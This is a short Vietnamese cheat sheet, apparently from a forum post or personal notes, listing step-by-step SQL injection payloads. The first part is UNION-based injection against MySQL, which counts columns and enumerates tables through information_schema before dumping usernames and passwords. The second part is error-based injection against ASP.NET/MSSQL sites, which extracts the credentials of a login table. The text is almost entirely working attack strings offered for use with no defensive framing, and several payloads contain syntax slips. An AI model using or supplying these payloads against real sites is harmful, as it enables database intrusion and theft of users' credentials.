Khai thác lỗi SQL cơ bản B1: order by 100-- - B2: union select 1,2,3,4,5,6,7,8,9,10-- - B3: union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables-- - có thể sử dụng câu lệnh Unhex(hex
B3: union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8 ,9 from information_schema.tables-- -
B4: union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database()--
B5: union select 1,2,3,group_concat(column_name),5,6,7,,8,9 from information_schema.columns where table_schema=database() and table_name=0x.... -- - chú ý: .... được mã hóa sang mãhex
được username và password B6: union select 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 from table_name
Khai thác lỗi SQL ASPX
B1: and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
B2: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')-- - < not in (.....)-- -> viết lệnh tiếp để ra các table
B3: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- - được thông số 'ID' tiếp and 1=convert(int,(select top 1 column name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in('ID') ))-- - được thông số 'username' tiếp and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID'),'username') ))-- - được thông số password
B4: Khai thác thông tin username và password: username: and 1=convert(int,(select top 1 username from tbl_DangNhap))-- - passord: and 1=convert(int,select top 1 password from tbl_DangNhap))-- -
